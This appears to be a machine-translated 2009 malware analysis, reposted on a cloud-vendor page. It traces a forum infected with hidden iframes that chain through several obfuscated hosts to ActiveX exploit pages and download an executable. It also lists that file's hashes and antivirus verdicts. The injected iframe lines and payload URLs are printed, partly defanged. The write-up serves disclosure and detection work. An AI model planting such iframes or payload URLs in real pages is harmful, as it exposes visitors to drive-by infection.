A forum is infected with worm. win32.autorun. eyh

Source: Internet
Author: User
Tags crypt

A forum is infected with worm. win32.autorun. eyh

The forum page contains code:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js'> </iframe>
---/

Hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js
Output code:
/---
<IFRAME src = "hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm" width = 1 Height = 0> </iframe>

Hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm
Code included:
/---
<IFRAME src=google.htm width = 100 Height = 0> </iframe>
---/

Hxxp: // M **. SF * S3 ** wws.cn/03/google.htm
A previously unknown encryption method is used. The first part of the code is:
/---
<HTML> ---/

Its function is to check the browser software. If it is an Internet browser, ie.swf is displayed, and ff.swf is displayed if it is negative. Then, the code is output:
/---
<IFRAME src1_all.htm width = 100 Height = 0> </iframe>
---/

Hxxp: // M **. SF * S3 ** wws.cn/03/all.htm

The same encryption method is used:
Use <IFRAME> to introduce the following web pages and use the vulnerability to download hxxp: // d1.csygg.com/01/g.exe:

1. htm

Exploiting MS-06014 Vulnerabilities

Kdosn.htm
Leverage the qvod player (CLSID: F3D0D36F-23F8-4682-A195-74C92B03D4AF) Vulnerability

Kc.htm
Download hxxp: // d1.csygg.com/01/baidu.cab by using the Baidu tool bar (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) Vulnerability

Newlz.htm
Exploiting the lizing (gliedown. iedown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8) Vulnerability

S.htm
Use Sina (Downloader. dloader.1, CLSID: 78abdc59-d8e7-44d3-9a76-9a0918c52b4a) Vulnerability

Office.htm
Using the MS Office (snpvw. Snapshot Viewer control.1) Vulnerability

Bf.htm
Use storm audio and video (MPs. stormplayer,) Vulnerabilities

Cx.htm
Use the superstar scanner (pdg2) Vulnerability

Uu.htm
Uusee network TV (uuupgrade. uuupgradectrl.1) Vulnerability

2. htm
Exploiting the hangameplugincn18.hangameplugincn18.1 Vulnerability

3. htm
4. htm
Use RealPlayer (ierpctl. ierpctl.1) Vulnerability

0. htm
Exploitation (CLSID: 19effc12-25fb-479a-a0f2-1569ae1b3365) Vulnerability

5. htm
Exploiting MS09-002 Vulnerabilities

File Description: D:/test/g.exe
Attribute: ---
Digital Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Creation Time: 22:38:20
Modification time: 22:38:20
Size: 25696 bytes, 25.96 KB
MD5: cae3e537b9d4495d31af6c360cb31dee
Sha1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
CRC32: 3ee9304b

 

Anti-Virus engine Version Last update Scan results
A-squared 4.0.0.101 2009.03.23 Win32.warezov! Ik
AhnLab-V3 5.0.0.2 2009.03.23 Packed/upack
AntiVir 7.9.0.120 2009.03.23 TR/crypt. upkm. gen
Authentium 5.1.2.4 2009.03.23 W32/systroj. N. Gen! Eldorado
Avast 4.8.1335.0 2009.03.23 -
AVG 8.5.0.283 2009.03.23 Rootkit-Agent.BN
BitDefender 7.2 2009.03.23 Generic. malware. SP! BPK! TKG. be60b47d
Cat-quickheal 10.00 2009.03.23 -
ClamAV 0.94.1 2009.03.23 Worm. Mytob-73
Comodo 1082 2009.03.23 -
Drweb 4.44.0.09170 2009.03.23 Dloader. Trojan
Esafe 7.0.20. 2009.03.23 Win32.looked. gen
ETrust-vet 31.6.6412 2009.03.23 -
F-Prot 4.4.4.56 2009.03.23 W32/systroj. N. Gen! Eldorado
F-Secure 8.0.14470.0 2009.03.23 Trojan. win32.agent2. gcy
Fortinet 3.117.0.0 2009.03.23 -
Gdata 19 2009.03.23 Generic. malware. SP! BPK! TKG. be60b47d
Ikarus T3.1.1.48.0 2009.03.23 Win32.warezov
K7antivirus 7.10.678 2009.03.21 Generic. Packed. Upack-1
Kaspersky 7.0.0.125 2009.03.23 Trojan. win32.agent2. gcy
McAfee 5561 2009.03.22 -
McAfee + Artemis 5561 2009.03.22 New malware. f
McAfee-GW-Edition 6.7.6 2009.03.23 Trojan. crypt. upkm. gen
Microsoft 1.4502 2009.03.23 -
NOD32 3953 2009.03.21 -
Norman 6.00.06 2009.03.23 W32/suspicious_u.gen
Nprotect 2009.1.8.0 2009.03.23 -
Panda 10.0.0.10 2009.03.22 -
Pctools 4.4.2.0 2009.03.23 Packed/upack
Prevx1 V2 2009.03.23 High risk Worm
Rising 21.22.02.00 2009.03.23 Worm. win32.autorun. eyh
Sophos 4.39.0 2009.03.23 Mal/packer
Sunbelt 3.2.1858.2 2009.03.22 -
Symantec 1.4.4.12 2009.03.23 Trojan. killav
Thehacker 6.3.3.4.287 2009.03.23 -
TrendMicro 8.700.0.1004 2009.03.23 Cryp_upack
Vba32 3.12.10.1 2009.03.23 -
ViRobot 2009.3.23.1660 2009.03.23 -
Virusbuster 4.6.5.0 2009.03.22 Packed/upack
Additional information
File Size: 25696 bytes
Md5...: cae3e537b9d4495d31af6c360cb31dee
Sha1..: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
Sha256: sha256
Sha512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca54259bb970550 <br> then
Ssdeep: 384: b5jocon1ffccinu9mg1_hy + qvmf6mfjt6unhqjnx8cw02igc8telalvr7l: B <br> 4co7ykjvxfjc7n2igptelavr <br>
Peid ..: upack 0.24-0.27 beta/0.28 alpha-& gt; Dwing
TRID ..: file type identification <br> dos executable generic (100.0%)
Peinfo: PE Structure Information <br> (base data) <br> entrypointaddress.: 0x1efe3 <br> timedatestamp .....: 0x0 (Thu Jan 01 00:00:00 1970) <br> machinetype .......: 0x14c (i386) <br> (2 sections) <br> name viradd virsiz rawdsiz ntrpy MD5 <br>. upack 0x1000 0x18000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e <br>. rsrc 0x19000 0xe000 0x6260 7.98 88e69c0ef43413739c008ef9e7337308 <br> (1 Imports) <br> & gt; kernel32.dll: loadlibrarya, getprocaddress <br> (0 exports) <br>
Prevx info: & lt; a href = 'HTTP: // info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 'target = '_ blank' & gt; http://info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 & lt;/A & gt;
Packers (Kaspersky): upack
Packers (authentium): embedded
Packers (F-Prot): embedded

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.